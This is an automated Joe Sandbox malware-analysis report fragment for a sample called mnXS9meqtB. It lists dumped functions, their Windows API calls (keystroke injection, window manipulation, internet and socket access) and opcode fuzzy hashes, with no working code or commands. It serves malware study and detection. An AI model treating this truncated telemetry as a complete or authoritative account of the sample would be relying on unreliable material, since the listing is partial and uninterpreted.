                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                            • API String ID: 2574300362-1816364905
                                                                            • Opcode ID: cd0ac72b49866e7a150c181ba8312fda6c88e9c327e0200c3094296b2fdeb531
                                                                            • Instruction ID: 3d7987874a22d5087eeb03330856318abd3c3b91ee2b443b094d14d953fcd8d0
                                                                            • Opcode Fuzzy Hash: cd0ac72b49866e7a150c181ba8312fda6c88e9c327e0200c3094296b2fdeb531
                                                                            • Instruction Fuzzy Hash: 59D0A730800723AFCB275F61E84CA8377E8AF00705F018459FC56D25A1DB70C8848B10
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0035BAD3,00000001,0035B6EE,?,0039DC00), ref: 0035BAEB
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0035BAFD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                            • API String ID: 2574300362-199464113
                                                                            • Opcode ID: 447ee8c31046d91e2249caf81530f92279403f35f2240bdd0f04b10a46222f6d
                                                                            • Instruction ID: d179ef805156dc74c9ee7dda3f71361055ea4cb0cacef538a4ecd5420a4a47f9
                                                                            • Opcode Fuzzy Hash: 447ee8c31046d91e2249caf81530f92279403f35f2240bdd0f04b10a46222f6d
                                                                            • Instruction Fuzzy Hash: 02D05E308047129EC7326F22A848E92B7D8AF00705F014459E943925A0D7B0C884C710
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,00363BD1,?,00363E06), ref: 00363BE9
                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00363BFB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                            • API String ID: 2574300362-4033151799
                                                                            • Opcode ID: 7d5af6dce54904ef2ca0354ff79e5aa3ae9821c1604724b2196b8e4f86817e86
                                                                            • Instruction ID: 06cf7dccd80837d7809211043e02d4887b3b356b7b23f2c243b1138189bc9686
                                                                            • Opcode Fuzzy Hash: 7d5af6dce54904ef2ca0354ff79e5aa3ae9821c1604724b2196b8e4f86817e86
                                                                            • Instruction Fuzzy Hash: B2D0A7705007129FC7225F60E80C7C3BBF8AF15718F118459F446E2590E7B0C4808F10
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9c3f9c8b065563aa9533d551d097e8a805faaae77fe750ad50ee307dec0cd34d
                                                                            • Instruction ID: 211628f19557f973052883579023cbe48336d76d98cb9e1bae4fd087ff950831
                                                                            • Opcode Fuzzy Hash: 9c3f9c8b065563aa9533d551d097e8a805faaae77fe750ad50ee307dec0cd34d
                                                                            • Instruction Fuzzy Hash: 00C14A75A0021AEFCB15DF94C8C4BAEB7B9FF48700F11459AE906AB251D7B0DE81DB90
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 0035AAB4
                                                                            • CoUninitialize.OLE32 ref: 0035AABF
                                                                              • Part of subcall function 00340213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0034027B
                                                                            • VariantInit.OLEAUT32(?), ref: 0035AACA
                                                                            • VariantClear.OLEAUT32(?), ref: 0035AD9D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                            • String ID:
                                                                            • API String ID: 780911581-0
                                                                            • Opcode ID: 3144860101b31f545afd278e3dbeec0217de8919d1c8504999e3a88e4a4d49a8
                                                                            • Instruction ID: fe73d5bdc7c7371d0e369f2a15d6971cc6f8606b3f435f433b87024286bce090
                                                                            • Opcode Fuzzy Hash: 3144860101b31f545afd278e3dbeec0217de8919d1c8504999e3a88e4a4d49a8
                                                                            • Instruction Fuzzy Hash: D5A15A35204B019FCB16EF14C491F5AB7E9BF88711F148549FA969B3A2CB30ED44DB86
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$AllocClearCopyInitString
                                                                            • String ID:
                                                                            • API String ID: 2808897238-0
                                                                            • Opcode ID: d7a9352167d9e3336f2fa85c8e4d9aa67a2def53ad4299f414fec09b895141e8
                                                                            • Instruction ID: f7252fc46356b9ab72fca273dc3f2fd2b04b0d5d7dea5fd9e691fda38b075fcc
                                                                            • Opcode Fuzzy Hash: d7a9352167d9e3336f2fa85c8e4d9aa67a2def53ad4299f414fec09b895141e8
                                                                            • Instruction Fuzzy Hash: 3751B674A44706DBDB26AF66D4D176EB3E9EF48320F20881FE546CB6D1DBB498808701
                                                                            APIs
                                                                            • GetWindowRect.USER32(00D27560,?), ref: 0036C544
                                                                            • ScreenToClient.USER32(?,00000002), ref: 0036C574
                                                                            • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0036C5DA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientMoveRectScreen
                                                                            • String ID:
                                                                            • API String ID: 3880355969-0
                                                                            • Opcode ID: 2f9f8a0e416bd5ca4bd2cb1387902badd43ed0d89c91a26e3f5924d96f204930
                                                                            • Instruction ID: 30e125110d4010096be740bd2ab4269b53fababcb90f6496a973288455d8c98a
                                                                            • Opcode Fuzzy Hash: 2f9f8a0e416bd5ca4bd2cb1387902badd43ed0d89c91a26e3f5924d96f204930
                                                                            • Instruction Fuzzy Hash: 68516D75A10208EFCF12DF68C880ABE7BB9EB46320F15D259F9959B295D730ED41CB90
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0033C462
                                                                            • __itow.LIBCMT ref: 0033C49C
                                                                              • Part of subcall function 0033C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0033C753
                                                                            • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0033C505
                                                                            • __itow.LIBCMT ref: 0033C55A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$__itow
                                                                            • String ID:
                                                                            • API String ID: 3379773720-0
                                                                            • Opcode ID: ec372fd7b3c5c282afbceb8e856b3d84cb7d8564b444293f89a8090c6f53b8e1
                                                                            • Instruction ID: 451bf3543c2beb2831f878b127f32d44f5d079ac7bff0a3d253035b6845853a2
                                                                            • Opcode Fuzzy Hash: ec372fd7b3c5c282afbceb8e856b3d84cb7d8564b444293f89a8090c6f53b8e1
                                                                            • Instruction Fuzzy Hash: E7418271A00208AFDF27DF55C892BEE7BB9AF49700F001059FA05BB291DB749A45CBA1
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00343966
                                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00343982
                                                                            • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 003439EF
                                                                            • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00343A4D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: f611b9b643fb0137a80c18a4acad335586d1989624d6068e2a8fed9394626a74
                                                                            • Instruction ID: e42e130f5e7fe179499169f7c4b24ddfaa031d0634c2c1ca968bb9e7dd816b01
                                                                            • Opcode Fuzzy Hash: f611b9b643fb0137a80c18a4acad335586d1989624d6068e2a8fed9394626a74
                                                                            • Instruction Fuzzy Hash: 48410970E44248AAEF238B64C805BFDBBF9AB55310F04015AF5C1AF2C1C7B4AE85D765
                                                                            APIs
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0036B5D1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 634782764-0
                                                                            • Opcode ID: 17fd1bc6a981bcc2c46ad6ab1ce45db24636f80ca6de13a80dcf0e5dfeaeec1c
                                                                            • Instruction ID: 1716703ac7a3118c591c558e0904d15f1f9af9495a028e5207e76de54a67d2be
                                                                            • Opcode Fuzzy Hash: 17fd1bc6a981bcc2c46ad6ab1ce45db24636f80ca6de13a80dcf0e5dfeaeec1c
                                                                            • Instruction Fuzzy Hash: 9731DE34601208ABEB238F18CC89FE8B769AB06350F61C111FA52D62E9D730A9D09F52
                                                                            APIs
                                                                            • ClientToScreen.USER32(?,?), ref: 0036D807
                                                                            • GetWindowRect.USER32(?,?), ref: 0036D87D
                                                                            • PtInRect.USER32(?,?,0036ED5A), ref: 0036D88D
                                                                            • MessageBeep.USER32(00000000), ref: 0036D8FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1352109105-0
                                                                            • Opcode ID: 2d8c720fff89dcb115e190644bc63df3a9e4c2f2761e76d64e3f5b377523036c
                                                                            • Instruction ID: d5e34a73949c261e98799b505687e9dfb82a5e4d098d8862c9c6ce312c24a780
                                                                            • Opcode Fuzzy Hash: 2d8c720fff89dcb115e190644bc63df3a9e4c2f2761e76d64e3f5b377523036c
                                                                            • Instruction Fuzzy Hash: 03416A71F00219DFCB13DF59D888EA9BBF9BB46354F1981A9E814DB269D730E941CB40
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,76AAC0D0,?,00008000), ref: 00343AB8
                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00343AD4
                                                                            • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00343B34
                                                                            • SendInput.USER32(00000001,?,0000001C,76AAC0D0,?,00008000), ref: 00343B92
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: f7467eadd723459144ef94d7bd131361132d8c0ddc15fb5e2974bc9ce98dfeee
                                                                            • Instruction ID: a3cdf0a49eb5bcf41af61b9ee069d16f1210ffb0714942b2b3dae624eca57dd3
                                                                            • Opcode Fuzzy Hash: f7467eadd723459144ef94d7bd131361132d8c0ddc15fb5e2974bc9ce98dfeee
                                                                            • Instruction Fuzzy Hash: B3310430A04258AEEF238B648819BFEBBE9DF55310F05015AE481AF2D1C774AB45DB62
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00334038
                                                                            • __isleadbyte_l.LIBCMT ref: 00334066
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00334094
                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 003340CA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: a410d6b1275c59e43e15c4077b685ac6c01616c39b903243845e93b81a38abde
                                                                            • Instruction ID: 0764a384a2e372765f04c4250fce9fe0e5e2cf4c6bef7877c2568266048aeb3a
                                                                            • Opcode Fuzzy Hash: a410d6b1275c59e43e15c4077b685ac6c01616c39b903243845e93b81a38abde
                                                                            • Instruction Fuzzy Hash: 7531C431704216EFDB2B9F74C884B7ABBA9FF41310F164428E6658B1A1E731E890D790
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 00367CB9
                                                                              • Part of subcall function 00345F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00345F6F
                                                                              • Part of subcall function 00345F55: GetCurrentThreadId.KERNEL32 ref: 00345F76
                                                                              • Part of subcall function 00345F55: AttachThreadInput.USER32(00000000,?,0034781F), ref: 00345F7D
                                                                            • GetCaretPos.USER32(?), ref: 00367CCA
                                                                            • ClientToScreen.USER32(00000000,?), ref: 00367D03
                                                                            • GetForegroundWindow.USER32 ref: 00367D09
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                            • String ID:
                                                                            • API String ID: 2759813231-0
                                                                            • Opcode ID: 262a6abbf5eda2842396f78105357fdd5df49ad4c847d84152d4e401ad7588ab
                                                                            • Instruction ID: 95cc102e8f2f909dcde97ba300e0773524813cc0f58d02b9c2b97d2f89c59ff4
                                                                            • Opcode Fuzzy Hash: 262a6abbf5eda2842396f78105357fdd5df49ad4c847d84152d4e401ad7588ab
                                                                            • Instruction Fuzzy Hash: 00312F71D00108AFDB01EFA9CC459EFBBFDEF58314B108466E815E7212DA31AE558BA0
                                                                            APIs
                                                                              • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
                                                                            • GetCursorPos.USER32(?), ref: 0036F211
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0037E4C0,?,?,?,?,?), ref: 0036F226
                                                                            • GetCursorPos.USER32(?), ref: 0036F270
                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0037E4C0,?,?,?), ref: 0036F2A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                            • String ID:
                                                                            • API String ID: 2864067406-0
                                                                            • Opcode ID: d6416ad7ea1ccd80d28c0256071e6c36c9465732eeaf5d74f8ed11506aed0dbf
                                                                            • Instruction ID: fcde085c9ee54a22c45cb1c8174fb39c2261fae1847599d7f21dc40682b5f240
                                                                            • Opcode Fuzzy Hash: d6416ad7ea1ccd80d28c0256071e6c36c9465732eeaf5d74f8ed11506aed0dbf
                                                                            • Instruction Fuzzy Hash: F521A23D500118AFCB178F55D868EEA7BB9EF0A710F148469F9058B2A6D3309D60DF50
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00354358
                                                                              • Part of subcall function 003543E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00354401
                                                                              • Part of subcall function 003543E2: InternetCloseHandle.WININET(00000000), ref: 0035449E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$CloseConnectHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 1463438336-0
                                                                            • Opcode ID: b3b30953ea2dcdaf7793932914b6df0de9e96489ec8d683f1013bc1cfdc9e5d8
                                                                            • Instruction ID: fcbc28742aa603d815b345a44535f226484ca68a65fe00e834bf31ab3c7522b0
                                                                            • Opcode Fuzzy Hash: b3b30953ea2dcdaf7793932914b6df0de9e96489ec8d683f1013bc1cfdc9e5d8
                                                                            • Instruction Fuzzy Hash: A621AC79200601BBEB1B9F609C00FBAB7ADBF4471AF01401ABA15966B0DB7198699B90
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00368AA6
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00368AC0
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00368ACE
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00368ADC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$AttributesLayered
                                                                            • String ID:
                                                                            • API String ID: 2169480361-0
                                                                            • Opcode ID: 9d7cbc74971b53394b35f4c400a56b863e54afb7ccaa53cb42951c22dcbdf535
                                                                            • Instruction ID: 6b4ccc2d9f3814c0399c5a0752c32e0ecffd2d413c10aa678bc736e1082ba7c5
                                                                            • Opcode Fuzzy Hash: 9d7cbc74971b53394b35f4c400a56b863e54afb7ccaa53cb42951c22dcbdf535
                                                                            • Instruction Fuzzy Hash: 7D11D031346111AFDB06AB58CC19FBA779DAF89320F148219F916CB2E2CF70AC008794
APIs
• select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00358AE0
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00358AF2
• accept.WSOCK32(00000000,00000000,00000000), ref: 00358AFF
• WSAGetLastError.WSOCK32(00000000), ref: 00358B16
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
